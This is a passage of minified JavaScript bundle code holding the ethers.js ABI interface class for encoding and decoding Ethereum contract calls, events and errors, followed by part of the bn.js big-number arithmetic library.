                            t[r] ? ot.warn("duplicate definition - " + r) : t[r] = e;
                        }), this.deploy || F(this, "deploy", se.from({
                            payable: !1,
                            type: "constructor"
                        })), F(this, "_isInterface", !0);
                    }
                    format(e) {
                        e || (e = Y.full), e === Y.sighash && ot.throwArgumentError("interface does not support formatting sighash", "format", e);
                        const t = this.fragments.map((t)=>t.format(e));
                        return e === Y.json ? JSON.stringify(t.map((e)=>JSON.parse(e))) : t;
                    }
                    static getAbiCoder() {
                        return nt;
                    }
                    static getAddress(e) {
                        return Se(e);
                    }
                    static getSighash(e) {
                        var t, r;
                        return r = 0, "string" != typeof (t = it(e.format())) ? t = T(t) : (!_(t) || t.length % 2) && m.throwArgumentError("invalid hexData", "value", t), r = 2 + 2 * r, "0x" + t.substring(r, 10);
                    }
                    static getEventTopic(e) {
                        return it(e.format());
                    }
                    getFunction(e) {
                        if (_(e)) {
                            for(const t in this.functions)if (e === this.getSighash(t)) return this.functions[t];
                            ot.throwArgumentError("no matching function", "sighash", e);
                        }
                        if (-1 === e.indexOf("(")) {
                            const t = e.trim(), r = Object.keys(this.functions).filter((e)=>e.split("(")[0] === t);
                            return 0 === r.length ? ot.throwArgumentError("no matching function", "name", t) : r.length > 1 && ot.throwArgumentError("multiple matching functions", "name", t), this.functions[r[0]];
                        }
                        const t = this.functions[ae.fromString(e).format()];
                        return t || ot.throwArgumentError("no matching function", "signature", e), t;
                    }
                    getEvent(e) {
                        if (_(e)) {
                            const t = e.toLowerCase();
                            for(const e in this.events)if (t === this.getEventTopic(e)) return this.events[e];
                            ot.throwArgumentError("no matching event", "topichash", t);
                        }
                        if (-1 === e.indexOf("(")) {
                            const t = e.trim(), r = Object.keys(this.events).filter((e)=>e.split("(")[0] === t);
                            return 0 === r.length ? ot.throwArgumentError("no matching event", "name", t) : r.length > 1 && ot.throwArgumentError("multiple matching events", "name", t), this.events[r[0]];
                        }
                        const t = this.events[re.fromString(e).format()];
                        return t || ot.throwArgumentError("no matching event", "signature", e), t;
                    }
                    getError(e) {
                        if (_(e)) {
                            const t = D(this.constructor, "getSighash");
                            for(const r in this.errors)if (e === t(this.errors[r])) return this.errors[r];
                            ot.throwArgumentError("no matching error", "sighash", e);
                        }
                        if (-1 === e.indexOf("(")) {
                            const t = e.trim(), r = Object.keys(this.errors).filter((e)=>e.split("(")[0] === t);
                            return 0 === r.length ? ot.throwArgumentError("no matching error", "name", t) : r.length > 1 && ot.throwArgumentError("multiple matching errors", "name", t), this.errors[r[0]];
                        }
                        const t = this.errors[ae.fromString(e).format()];
                        return t || ot.throwArgumentError("no matching error", "signature", e), t;
                    }
                    getSighash(e) {
                        if ("string" == typeof e) try {
                            e = this.getFunction(e);
                        } catch (t) {
                            try {
                                e = this.getError(e);
                            } catch (e) {
                                throw t;
                            }
                        }
                        return D(this.constructor, "getSighash")(e);
                    }
                    getEventTopic(e) {
                        return "string" == typeof e && (e = this.getEvent(e)), D(this.constructor, "getEventTopic")(e);
                    }
                    _decodeParams(e, t) {
                        return this._abiCoder.decode(e, t);
                    }
                    _encodeParams(e, t) {
                        return this._abiCoder.encode(e, t);
                    }
                    encodeDeploy(e) {
                        return this._encodeParams(this.deploy.inputs, e || []);
                    }
                    decodeErrorResult(e, t) {
                        "string" == typeof e && (e = this.getError(e));
                        const r = E(t);
                        return T(r.slice(0, 4)) !== this.getSighash(e) && ot.throwArgumentError(`data signature does not match error ${e.name}.`, "data", T(r)), this._decodeParams(e.inputs, r.slice(4));
                    }
                    encodeErrorResult(e, t) {
                        return "string" == typeof e && (e = this.getError(e)), T(A([
                            this.getSighash(e),
                            this._encodeParams(e.inputs, t || [])
                        ]));
                    }
                    decodeFunctionData(e, t) {
                        "string" == typeof e && (e = this.getFunction(e));
                        const r = E(t);
                        return T(r.slice(0, 4)) !== this.getSighash(e) && ot.throwArgumentError(`data signature does not match function ${e.name}.`, "data", T(r)), this._decodeParams(e.inputs, r.slice(4));
                    }
                    encodeFunctionData(e, t) {
                        return "string" == typeof e && (e = this.getFunction(e)), T(A([
                            this.getSighash(e),
                            this._encodeParams(e.inputs, t || [])
                        ]));
                    }
                    decodeFunctionResult(e, t) {
                        "string" == typeof e && (e = this.getFunction(e));
                        let r = E(t), n = null, i = "", o = null, s = null, a = null;
                        switch(r.length % this._abiCoder._getWordSize()){
                            case 0:
                                try {
                                    return this._abiCoder.decode(e.outputs, r);
                                } catch (e) {}
                                break;
                            case 4:
                                {
                                    const e = T(r.slice(0, 4)), t = lt[e];
                                    if (t) o = this._abiCoder.decode(t.inputs, r.slice(4)), s = t.name, a = t.signature, t.reason && (n = o[0]), "Error" === s ? i = `; VM Exception while processing transaction: reverted with reason string ${JSON.stringify(o[0])}` : "Panic" === s && (i = `; VM Exception while processing transaction: reverted with panic code ${o[0]}`);
                                    else try {
                                        const t = this.getError(e);
                                        o = this._abiCoder.decode(t.inputs, r.slice(4)), s = t.name, a = t.format();
                                    } catch (e) {}
                                    break;
                                }
                        }
                        return ot.throwError("call revert exception" + i, p.errors.CALL_EXCEPTION, {
                            method: e.format(),
                            data: T(t),
                            errorArgs: o,
                            errorName: s,
                            errorSignature: a,
                            reason: n
                        });
                    }
                    encodeFunctionResult(e, t) {
                        return "string" == typeof e && (e = this.getFunction(e)), T(this._abiCoder.encode(e.outputs, t || []));
                    }
                    encodeFilterTopics(e, t) {
                        "string" == typeof e && (e = this.getEvent(e)), t.length > e.inputs.length && ot.throwError("too many arguments for " + e.format(), p.errors.UNEXPECTED_ARGUMENT, {
                            argument: "values",
                            value: t
                        });
                        let r = [];
                        e.anonymous || r.push(this.getEventTopic(e));
                        const n = (e, t)=>"string" === e.type ? it(t) : "bytes" === e.type ? Ae(T(t)) : ("bool" === e.type && "boolean" == typeof t && (t = t ? "0x01" : "0x00"), e.type.match(/^u?int/) && (t = M.from(t).toHexString()), "address" === e.type && this._abiCoder.encode([
                                "address"
                            ], [
                                t
                            ]), R(T(t), 32));
                        for(t.forEach((t, i)=>{
                            let o = e.inputs[i];
                            o.indexed ? null == t ? r.push(null) : "array" === o.baseType || "tuple" === o.baseType ? ot.throwArgumentError("filtering with tuples or arrays not supported", "contract." + o.name, t) : Array.isArray(t) ? r.push(t.map((e)=>n(o, e))) : r.push(n(o, t)) : null != t && ot.throwArgumentError("cannot filter non-indexed parameters; must be null", "contract." + o.name, t);
                        }); r.length && null === r[r.length - 1];)r.pop();
                        return r;
                    }
                    encodeEventLog(e, t) {
                        "string" == typeof e && (e = this.getEvent(e));
                        const r = [], n = [], i = [];
                        return e.anonymous || r.push(this.getEventTopic(e)), t.length !== e.inputs.length && ot.throwArgumentError("event arguments/values mismatch", "values", t), e.inputs.forEach((e, o)=>{
                            const s = t[o];
                            if (e.indexed) {
                                if ("string" === e.type) r.push(it(s));
                                else if ("bytes" === e.type) r.push(Ae(s));
                                else {
                                    if ("tuple" === e.baseType || "array" === e.baseType) throw new Error("not implemented");
                                    r.push(this._abiCoder.encode([
                                        e.type
                                    ], [
                                        s
                                    ]));
                                }
                            } else n.push(e), i.push(s);
                        }), {
                            data: this._abiCoder.encode(n, i),
                            topics: r
                        };
                    }
                    decodeEventLog(e, t, r) {
                        if ("string" == typeof e && (e = this.getEvent(e)), null != r && !e.anonymous) {
                            let t = this.getEventTopic(e);
                            _(r[0], 32) && r[0].toLowerCase() === t || ot.throwError("fragment/topic mismatch", p.errors.INVALID_ARGUMENT, {
                                argument: "topics[0]",
                                expected: t,
                                value: r[0]
                            }), r = r.slice(1);
                        }
                        let n = [], i = [], o = [];
                        e.inputs.forEach((e, t)=>{
                            e.indexed ? "string" === e.type || "bytes" === e.type || "tuple" === e.baseType || "array" === e.baseType ? (n.push($.fromObject({
                                type: "bytes32",
                                name: e.name
                            })), o.push(!0)) : (n.push(e), o.push(!1)) : (i.push(e), o.push(!1));
                        });
                        let s = null != r ? this._abiCoder.decode(n, A(r)) : null, a = this._abiCoder.decode(i, t, !0), u = [], c = 0, l = 0;
                        e.inputs.forEach((e, t)=>{
                            if (e.indexed) {
                                if (null == s) u[t] = new ct({
                                    _isIndexed: !0,
                                    hash: null
                                });
                                else if (o[t]) u[t] = new ct({
                                    _isIndexed: !0,
                                    hash: s[l++]
                                });
                                else try {
                                    u[t] = s[l++];
                                } catch (e) {
                                    u[t] = e;
                                }
                            } else try {
                                u[t] = a[c++];
                            } catch (e) {
                                u[t] = e;
                            }
                            if (e.name && null == u[e.name]) {
                                const r = u[t];
                                r instanceof Error ? Object.defineProperty(u, e.name, {
                                    enumerable: !0,
                                    get: ()=>{
                                        throw dt(`property ${JSON.stringify(e.name)}`, r);
                                    }
                                }) : u[e.name] = r;
                            }
                        });
                        for(let e = 0; e < u.length; e++){
                            const t = u[e];
                            t instanceof Error && Object.defineProperty(u, e, {
                                enumerable: !0,
                                get: ()=>{
                                    throw dt(`index ${e}`, t);
                                }
                            });
                        }
                        return Object.freeze(u);
                    }
                    parseTransaction(e) {
                        let t = this.getFunction(e.data.substring(0, 10).toLowerCase());
                        return t ? new at({
                            args: this._abiCoder.decode(t.inputs, "0x" + e.data.substring(10)),
                            functionFragment: t,
                            name: t.name,
                            signature: t.format(),
                            sighash: this.getSighash(t),
                            value: M.from(e.value || "0")
                        }) : null;
                    }
                    parseLog(e) {
                        let t = this.getEvent(e.topics[0]);
                        return !t || t.anonymous ? null : new st({
                            eventFragment: t,
                            name: t.name,
                            signature: t.format(),
                            topic: this.getEventTopic(t),
                            args: this.decodeEventLog(t, e.data, e.topics)
                        });
                    }
                    parseError(e) {
                        const t = T(e);
                        let r = this.getError(t.substring(0, 10).toLowerCase());
                        return r ? new ut({
                            args: this._abiCoder.decode(r.inputs, "0x" + t.substring(10)),
                            errorFragment: r,
                            name: r.name,
                            signature: r.format(),
                            sighash: this.getSighash(r)
                        }) : null;
                    }
                    static isInterface(e) {
                        return !(!e || !e._isInterface);
                    }
                }
            },
            4269: function(e, t, r) {
                !function(e, t) {
                    "use strict";
                    function n(e, t) {
                        if (!e) throw new Error(t || "Assertion failed");
                    }
                    function i(e, t) {
                        e.super_ = t;
                        var r = function() {};
                        r.prototype = t.prototype, e.prototype = new r, e.prototype.constructor = e;
                    }
                    function o(e, t, r) {
                        if (o.isBN(e)) return e;
                        this.negative = 0, this.words = null, this.length = 0, this.red = null, null !== e && ("le" !== t && "be" !== t || (r = t, t = 10), this._init(e || 0, t || 10, r || "be"));
                    }
                    var s;
                    "object" == typeof e ? e.exports = o : t.BN = o, o.BN = o, o.wordSize = 26;
                    try {
                        s = "undefined" != typeof window && void 0 !== window.Buffer ? window.Buffer : r(9005).Buffer;
                    } catch (e) {}
                    function a(e, t) {
                        var r = e.charCodeAt(t);
                        return r >= 48 && r <= 57 ? r - 48 : r >= 65 && r <= 70 ? r - 55 : r >= 97 && r <= 102 ? r - 87 : void n(!1, "Invalid character in " + e);
                    }
                    function u(e, t, r) {
                        var n = a(e, r);
                        return r - 1 >= t && (n |= a(e, r - 1) << 4), n;
                    }
                    function c(e, t, r, i) {
                        for(var o = 0, s = 0, a = Math.min(e.length, r), u = t; u < a; u++){
                            var c = e.charCodeAt(u) - 48;
                            o *= i, s = c >= 49 ? c - 49 + 10 : c >= 17 ? c - 17 + 10 : c, n(c >= 0 && s < i, "Invalid character"), o += s;
                        }
                        return o;
                    }
                    function l(e, t) {
                        e.words = t.words, e.length = t.length, e.negative = t.negative, e.red = t.red;
                    }
                    if (o.isBN = function(e) {
                        return e instanceof o || null !== e && "object" == typeof e && e.constructor.wordSize === o.wordSize && Array.isArray(e.words);
                    }, o.max = function(e, t) {
                        return e.cmp(t) > 0 ? e : t;
                    }, o.min = function(e, t) {
                        return e.cmp(t) < 0 ? e : t;
                    }, o.prototype._init = function(e, t, r) {
                        if ("number" == typeof e) return this._initNumber(e, t, r);
                        if ("object" == typeof e) return this._initArray(e, t, r);
                        "hex" === t && (t = 16), n(t === (0 | t) && t >= 2 && t <= 36);
                        var i = 0;
                        "-" === (e = e.toString().replace(/\s+/g, ""))[0] && (i++, this.negative = 1), i < e.length && (16 === t ? this._parseHex(e, i, r) : (this._parseBase(e, t, i), "le" === r && this._initArray(this.toArray(), t, r)));
                    }, o.prototype._initNumber = function(e, t, r) {
                        e < 0 && (this.negative = 1, e = -e), e < 67108864 ? (this.words = [
                            67108863 & e
                        ], this.length = 1) : e < 4503599627370496 ? (this.words = [
                            67108863 & e,
                            e / 67108864 & 67108863
                        ], this.length = 2) : (n(e < 9007199254740992), this.words = [
                            67108863 & e,
                            e / 67108864 & 67108863,
                            1
                        ], this.length = 3), "le" === r && this._initArray(this.toArray(), t, r);
                    }, o.prototype._initArray = function(e, t, r) {
                        if (n("number" == typeof e.length), e.length <= 0) return this.words = [
                            0
                        ], this.length = 1, this;
                        this.length = Math.ceil(e.length / 3), this.words = new Array(this.length);
                        for(var i = 0; i < this.length; i++)this.words[i] = 0;
                        var o, s, a = 0;
                        if ("be" === r) for(i = e.length - 1, o = 0; i >= 0; i -= 3)s = e[i] | e[i - 1] << 8 | e[i - 2] << 16, this.words[o] |= s << a & 67108863, this.words[o + 1] = s >>> 26 - a & 67108863, (a += 24) >= 26 && (a -= 26, o++);
                        else if ("le" === r) for(i = 0, o = 0; i < e.length; i += 3)s = e[i] | e[i + 1] << 8 | e[i + 2] << 16, this.words[o] |= s << a & 67108863, this.words[o + 1] = s >>> 26 - a & 67108863, (a += 24) >= 26 && (a -= 26, o++);
                        return this._strip();
                    }, o.prototype._parseHex = function(e, t, r) {
                        this.length = Math.ceil((e.length - t) / 6), this.words = new Array(this.length);
                        for(var n = 0; n < this.length; n++)this.words[n] = 0;
                        var i, o = 0, s = 0;
                        if ("be" === r) for(n = e.length - 1; n >= t; n -= 2)i = u(e, t, n) << o, this.words[s] |= 67108863 & i, o >= 18 ? (o -= 18, s += 1, this.words[s] |= i >>> 26) : o += 8;
                        else for(n = (e.length - t) % 2 == 0 ? t + 1 : t; n < e.length; n += 2)i = u(e, t, n) << o, this.words[s] |= 67108863 & i, o >= 18 ? (o -= 18, s += 1, this.words[s] |= i >>> 26) : o += 8;
                        this._strip();
                    }, o.prototype._parseBase = function(e, t, r) {
                        this.words = [
                            0
                        ], this.length = 1;
                        for(var n = 0, i = 1; i <= 67108863; i *= t)n++;
                        n--, i = i / t | 0;
                        for(var o = e.length - r, s = o % n, a = Math.min(o, o - s) + r, u = 0, l = r; l < a; l += n)u = c(e, l, l + n, t), this.imuln(i), this.words[0] + u < 67108864 ? this.words[0] += u : this._iaddn(u);
                        if (0 !== s) {
                            var d = 1;
                            for(u = c(e, l, e.length, t), l = 0; l < s; l++)d *= t;
                            this.imuln(d), this.words[0] + u < 67108864 ? this.words[0] += u : this._iaddn(u);
                        }
                        this._strip();
                    }, o.prototype.copy = function(e) {
                        e.words = new Array(this.length);
                        for(var t = 0; t < this.length; t++)e.words[t] = this.words[t];
                        e.length = this.length, e.negative = this.negative, e.red = this.red;
                    }, o.prototype._move = function(e) {
                        l(e, this);
                    }, o.prototype.clone = function() {
                        var e = new o(null);
                        return this.copy(e), e;
                    }, o.prototype._expand = function(e) {
                        for(; this.length < e;)this.words[this.length++] = 0;
                        return this;
                    }, o.prototype._strip = function() {
                        for(; this.length > 1 && 0 === this.words[this.length - 1];)this.length--;
                        return this._normSign();
                    }, o.prototype._normSign = function() {
                        return 1 === this.length && 0 === this.words[0] && (this.negative = 0), this;
                    }, "undefined" != typeof Symbol && "function" == typeof Symbol.for) try {
                        o.prototype[Symbol.for("nodejs.util.inspect.custom")] = d;
                    } catch (e) {
                        o.prototype.inspect = d;
                    }
                    else o.prototype.inspect = d;
                    function d() {
                        return (this.red ? "<BN-R: " : "<BN: ") + this.toString(16) + ">";
                    }
                    var h = [
                        "",
                        "0",
                        "00",
                        "000",
                        "0000",
                        "00000",
                        "000000",
                        "0000000",
                        "00000000",
                        "000000000",
                        "0000000000",
                        "00000000000",
                        "000000000000",
                        "0000000000000",
                        "00000000000000",
                        "000000000000000",
                        "0000000000000000",
                        "00000000000000000",
                        "000000000000000000",
                        "0000000000000000000",
                        "00000000000000000000",
                        "000000000000000000000",
                        "0000000000000000000000",
                        "00000000000000000000000",
                        "000000000000000000000000",
                        "0000000000000000000000000"
                    ], f = [
                        0,
                        0,
                        25,
                        16,
                        12,
                        11,
                        10,
                        9,
                        8,
                        8,
                        7,
                        7,
                        7,
                        7,
                        6,
                        6,
                        6,
                        6,
                        6,
                        6,
                        6,
                        5,
                        5,
                        5,
                        5,
                        5,
                        5,
                        5,
                        5,
                        5,
                        5,
                        5,
                        5,
                        5,
                        5,
                        5,
                        5
                    ], p = [
                        0,
                        0,
                        33554432,
                        43046721,
                        16777216,
                        48828125,
                        60466176,
                        40353607,
                        16777216,
                        43046721,
                        1e7,
                        19487171,
                        35831808,
                        62748517,
                        7529536,
                        11390625,
                        16777216,
                        24137569,
                        34012224,
                        47045881,
                        64e6,
                        4084101,
                        5153632,
                        6436343,
                        7962624,
                        9765625,
                        11881376,
                        14348907,
                        17210368,
                        20511149,
                        243e5,
                        28629151,
                        33554432,
                        39135393,
                        45435424,
                        52521875,
                        60466176
                    ];
                    function m(e, t, r) {
                        r.negative = t.negative ^ e.negative;
                        var n = e.length + t.length | 0;
                        r.length = n, n = n - 1 | 0;
                        var i = 0 | e.words[0], o = 0 | t.words[0], s = i * o, a = 67108863 & s, u = s / 67108864 | 0;
                        r.words[0] = a;
                        for(var c = 1; c < n; c++){
                            for(var l = u >>> 26, d = 67108863 & u, h = Math.min(c, t.length - 1), f = Math.max(0, c - e.length + 1); f <= h; f++){
                                var p = c - f | 0;
                                l += (s = (i = 0 | e.words[p]) * (o = 0 | t.words[f]) + d) / 67108864 | 0, d = 67108863 & s;
                            }
                            r.words[c] = 0 | d, u = 0 | l;
                        }
                        return 0 !== u ? r.words[c] = 0 | u : r.length--, r._strip();
                    }
                    o.prototype.toString = function(e, t) {
                        var r;
                        if (t = 0 | t || 1, 16 === (e = e || 10) || "hex" === e) {
                            r = "";
                            for(var i = 0, o = 0, s = 0; s < this.length; s++){
                                var a = this.words[s], u = (16777215 & (a << i | o)).toString(16);
                                o = a >>> 24 - i & 16777215, (i += 2) >= 26 && (i -= 26, s--), r = 0 !== o || s !== this.length - 1 ? h[6 - u.length] + u + r : u + r;
                            }
                            for(0 !== o && (r = o.toString(16) + r); r.length % t != 0;)r = "0" + r;
                            return 0 !== this.negative && (r = "-" + r), r;
                        }
                        if (e === (0 | e) && e >= 2 && e <= 36) {
                            var c = f[e], l = p[e];
                            r = "";
                            var d = this.clone();
                            for(d.negative = 0; !d.isZero();){
                                var m = d.modrn(l).toString(e);
                                r = (d = d.idivn(l)).isZero() ? m + r : h[c - m.length] + m + r;
                            }
                            for(this.isZero() && (r = "0" + r); r.length % t != 0;)r = "0" + r;
                            return 0 !== this.negative && (r = "-" + r), r;
                        }
                        n(!1, "Base should be between 2 and 36");
                    }, o.prototype.toNumber = function() {
                        var e = this.words[0];
                        return 2 === this.length ? e += 67108864 * this.words[1] : 3 === this.length && 1 === this.words[2] ? e += 4503599627370496 + 67108864 * this.words[1] : this.length > 2 && n(!1, "Number can only safely store up to 53 bits"), 0 !== this.negative ? -e : e;
                    }, o.prototype.toJSON = function() {
                        return this.toString(16, 2);
                    }, s && (o.prototype.toBuffer = function(e, t) {
                        return this.toArrayLike(s, e, t);
                    }), o.prototype.toArray = function(e, t) {
                        return this.toArrayLike(Array, e, t);
                    }, o.prototype.toArrayLike = function(e, t, r) {
                        this._strip();
                        var i = this.byteLength(), o = r || Math.max(1, i);
                        n(i <= o, "byte array longer than desired length"), n(o > 0, "Requested array length <= 0");
                        var s = function(e, t) {
                            return e.allocUnsafe ? e.allocUnsafe(t) : new e(t);
                        }(e, o);
                        return this["_toArrayLike" + ("le" === t ? "LE" : "BE")](s, i), s;
                    }, o.prototype._toArrayLikeLE = function(e, t) {
                        for(var r = 0, n = 0, i = 0, o = 0; i < this.length; i++){
                            var s = this.words[i] << o | n;
                            e[r++] = 255 & s, r < e.length && (e[r++] = s >> 8 & 255), r < e.length && (e[r++] = s >> 16 & 255), 6 === o ? (r < e.length && (e[r++] = s >> 24 & 255), n = 0, o = 0) : (n = s >>> 24, o += 2);
                        }
                        if (r < e.length) for(e[r++] = n; r < e.length;)e[r++] = 0;
                    }, o.prototype._toArrayLikeBE = function(e, t) {
                        for(var r = e.length - 1, n = 0, i = 0, o = 0; i < this.length; i++){
                            var s = this.words[i] << o | n;
                            e[r--] = 255 & s, r >= 0 && (e[r--] = s >> 8 & 255), r >= 0 && (e[r--] = s >> 16 & 255), 6 === o ? (r >= 0 && (e[r--] = s >> 24 & 255), n = 0, o = 0) : (n = s >>> 24, o += 2);
                        }
                        if (r >= 0) for(e[r--] = n; r >= 0;)e[r--] = 0;
                    }, Math.clz32 ? o.prototype._countBits = function(e) {
                        return 32 - Math.clz32(e);
                    } : o.prototype._countBits = function(e) {
                        var t = e, r = 0;
                        return t >= 4096 && (r += 13, t >>>= 13), t >= 64 && (r += 7, t >>>= 7), t >= 8 && (r += 4, t >>>= 4), t >= 2 && (r += 2, t >>>= 2), r + t;
                    }, o.prototype._zeroBits = function(e) {
                        if (0 === e) return 26;
                        var t = e, r = 0;
                        return 0 == (8191 & t) && (r += 13, t >>>= 13), 0 == (127 & t) && (r += 7, t >>>= 7), 0 == (15 & t) && (r += 4, t >>>= 4), 0 == (3 & t) && (r += 2, t >>>= 2), 0 == (1 & t) && r++, r;
                    }, o.prototype.bitLength = function() {
                        var e = this.words[this.length - 1], t = this._countBits(e);
                        return 26 * (this.length - 1) + t;
                    }, o.prototype.zeroBits = function() {
                        if (this.isZero()) return 0;
                        for(var e = 0, t = 0; t < this.length; t++){
                            var r = this._zeroBits(this.words[t]);
                            if (e += r, 26 !== r) break;
                        }
                        return e;
                    }, o.prototype.byteLength = function() {
                        return Math.ceil(this.bitLength() / 8);
                    }, o.prototype.toTwos = function(e) {
                        return 0 !== this.negative ? this.abs().inotn(e).iaddn(1) : this.clone();
                    }, o.prototype.fromTwos = function(e) {
                        return this.testn(e - 1) ? this.notn(e).iaddn(1).ineg() : this.clone();
                    }, o.prototype.isNeg = function() {
                        return 0 !== this.negative;
                    }, o.prototype.neg = function() {
                        return this.clone().ineg();
                    }, o.prototype.ineg = function() {
                        return this.isZero() || (this.negative ^= 1), this;
                    }, o.prototype.iuor = function(e) {
                        for(; this.length < e.length;)this.words[this.length++] = 0;
                        for(var t = 0; t < e.length; t++)this.words[t] = this.words[t] | e.words[t];
                        return this._strip();
                    }, o.prototype.ior = function(e) {
                        return n(0 == (this.negative | e.negative)), this.iuor(e);
                    }, o.prototype.or = function(e) {
                        return this.length > e.length ? this.clone().ior(e) : e.clone().ior(this);
                    }, o.prototype.uor = function(e) {
                        return this.length > e.length ? this.clone().iuor(e) : e.clone().iuor(this);
                    }, o.prototype.iuand = function(e) {
                        var t;
                        t = this.length > e.length ? e : this;
                        for(var r = 0; r < t.length; r++)this.words[r] = this.words[r] & e.words[r];
                        return this.length = t.length, this._strip();
                    }, o.prototype.iand = function(e) {
                        return n(0 == (this.negative | e.negative)), this.iuand(e);
                    }, o.prototype.and = function(e) {
                        return this.length > e.length ? this.clone().iand(e) : e.clone().iand(this);
                    }, o.prototype.uand = function(e) {
                        return this.length > e.length ? this.clone().iuand(e) : e.clone().iuand(this);
                    }, o.prototype.iuxor = function(e) {
                        var t, r;
                        this.length > e.length ? (t = this, r = e) : (t = e, r = this);
                        for(var n = 0; n < r.length; n++)this.words[n] = t.words[n] ^ r.words[n];
                        if (this !== t) for(; n < t.length; n++)this.words[n] = t.words[n];
                        return this.length = t.length, this._strip();
                    }, o.prototype.ixor = function(e) {
                        return n(0 == (this.negative | e.negative)), this.iuxor(e);
                    }, o.prototype.xor = function(e) {
                        return this.length > e.length ? this.clone().ixor(e) : e.clone().ixor(this);
                    }, o.prototype.uxor = function(e) {
                        return this.length > e.length ? this.clone().iuxor(e) : e.clone().iuxor(this);
                    }, o.prototype.inotn = function(e) {
                        n("number" == typeof e && e >= 0);
                        var t = 0 | Math.ceil(e / 26), r = e % 26;
                        this._expand(t), r > 0 && t--;
                        for(var i = 0; i < t; i++)this.words[i] = 67108863 & ~this.words[i];
                        return r > 0 && (this.words[i] = ~this.words[i] & 67108863 >> 26 - r), this._strip();
                    }, o.prototype.notn = function(e) {
                        return this.clone().inotn(e);
                    }, o.prototype.setn = function(e, t) {
                        n("number" == typeof e && e >= 0);
                        var r = e / 26 | 0, i = e % 26;
                        return this._expand(r + 1), this.words[r] = t ? this.words[r] | 1 << i : this.words[r] & ~(1 << i), this._strip();
                    }, o.prototype.iadd = function(e) {
                        var t, r, n;
                        if (0 !== this.negative && 0 === e.negative) return this.negative = 0, t = this.isub(e), this.negative ^= 1, this._normSign();
                        if (0 === this.negative && 0 !== e.negative) return e.negative = 0, t = this.isub(e), e.negative = 1, t._normSign();
                        this.length > e.length ? (r = this, n = e) : (r = e, n = this);
                        for(var i = 0, o = 0; o < n.length; o++)t = (0 | r.words[o]) + (0 | n.words[o]) + i, this.words[o] = 67108863 & t, i = t >>> 26;
                        for(; 0 !== i && o < r.length; o++)t = (0 | r.words[o]) + i, this.words[o] = 67108863 & t, i = t >>> 26;
                        if (this.length = r.length, 0 !== i) this.words[this.length] = i, this.length++;
                        else if (r !== this) for(; o < r.length; o++)this.words[o] = r.words[o];
                        return this;
                    }, o.prototype.add = function(e) {
                        var t;
                        return 0 !== e.negative && 0 === this.negative ? (e.negative = 0, t = this.sub(e), e.negative ^= 1, t) : 0 === e.negative && 0 !== this.negative ? (this.negative = 0, t = e.sub(this), this.negative = 1, t) : this.length > e.length ? this.clone().iadd(e) : e.clone().iadd(this);
                    }, o.prototype.isub = function(e) {
                        if (0 !== e.negative) {
                            e.negative = 0;
                            var t = this.iadd(e);
                            return e.negative = 1, t._normSign();
                        }
                        if (0 !== this.negative) return this.negative = 0, this.iadd(e), this.negative = 1, this._normSign();
                        var r, n, i = this.cmp(e);
                        if (0 === i) return this.negative = 0, this.length = 1, this.words[0] = 0, this;
                        i > 0 ? (r = this, n = e) : (r = e, n = this);
                        for(var o = 0, s = 0; s < n.length; s++)o = (t = (0 | r.words[s]) - (0 | n.words[s]) + o) >> 26, this.words[s] = 67108863 & t;
                        for(; 0 !== o && s < r.length; s++)o = (t = (0 | r.words[s]) + o) >> 26, this.words[s] = 67108863 & t;
                        if (0 === o && s < r.length && r !== this) for(; s < r.length; s++)this.words[s] = r.words[s];
                        return this.length = Math.max(this.length, s), r !== this && (this.negative = 1), this._strip();
                    }, o.prototype.sub = function(e) {
                        return this.clone().isub(e);
                    };
                    var g = function(e, t, r) {
                        var n, i, o, s = e.words, a = t.words, u = r.words, c = 0, l = 0 | s[0], d = 8191 & l, h = l >>> 13, f = 0 | s[1], p = 8191 & f, m = f >>> 13, g = 0 | s[2], y = 8191 & g, v = g >>> 13, b = 0 | s[3], E = 8191 & b, A = b >>> 13, _ = 0 | s[4], w = 8191 & _, T = _ >>> 13, R = 0 | s[5], I = 8191 & R, S = R >>> 13, P = 0 | s[6], O = 8191 & P, x = P >>> 13, M = 0 | s[7], B = 8191 & M, N = M >>> 13, C = 0 | s[8], k = 8191 & C, L = C >>> 13, F = 0 | s[9], D = 8191 & F, j = F >>> 13, U = 0 | a[0], H = 8191 & U, G = U >>> 13, V = 0 | a[1], W = 8191 & V, q = V >>> 13, z = 0 | a[2], Q = 8191 & z, K = z >>> 13, J = 0 | a[3], X = 8191 & J, Y = J >>> 13, Z = 0 | a[4], $ = 8191 & Z, ee = Z >>> 13, te = 0 | a[5], re = 8191 & te, ne = te >>> 13, ie = 0 | a[6], oe = 8191 & ie, se = ie >>> 13, ae = 0 | a[7], ue = 8191 & ae, ce = ae >>> 13, le = 0 | a[8], de = 8191 & le, he = le >>> 13, fe = 0 | a[9], pe = 8191 & fe, me = fe >>> 13;
                        r.negative = e.negative ^ t.negative, r.length = 19;
                        var ge = (c + (n = Math.imul(d, H)) | 0) + ((8191 & (i = (i = Math.imul(d, G)) + Math.imul(h, H) | 0)) << 13) | 0;
                        c = ((o = Math.imul(h, G)) + (i >>> 13) | 0) + (ge >>> 26) | 0, ge &= 67108863, n = Math.imul(p, H), i = (i = Math.imul(p, G)) + Math.imul(m, H) | 0, o = Math.imul(m, G);
                        var ye = (c + (n = n + Math.imul(d, W) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(d, q) | 0) + Math.imul(h, W) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(h, q) | 0) + (i >>> 13) | 0) + (ye >>> 26) | 0, ye &= 67108863, n = Math.imul(y, H), i = (i = Math.imul(y, G)) + Math.imul(v, H) | 0, o = Math.imul(v, G), n = n + Math.imul(p, W) | 0, i = (i = i + Math.imul(p, q) | 0) + Math.imul(m, W) | 0, o = o + Math.imul(m, q) | 0;
                        var ve = (c + (n = n + Math.imul(d, Q) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(d, K) | 0) + Math.imul(h, Q) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(h, K) | 0) + (i >>> 13) | 0) + (ve >>> 26) | 0, ve &= 67108863, n = Math.imul(E, H), i = (i = Math.imul(E, G)) + Math.imul(A, H) | 0, o = Math.imul(A, G), n = n + Math.imul(y, W) | 0, i = (i = i + Math.imul(y, q) | 0) + Math.imul(v, W) | 0, o = o + Math.imul(v, q) | 0, n = n + Math.imul(p, Q) | 0, i = (i = i + Math.imul(p, K) | 0) + Math.imul(m, Q) | 0, o = o + Math.imul(m, K) | 0;
                        var be = (c + (n = n + Math.imul(d, X) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(d, Y) | 0) + Math.imul(h, X) | 0)) << 13) | 0;
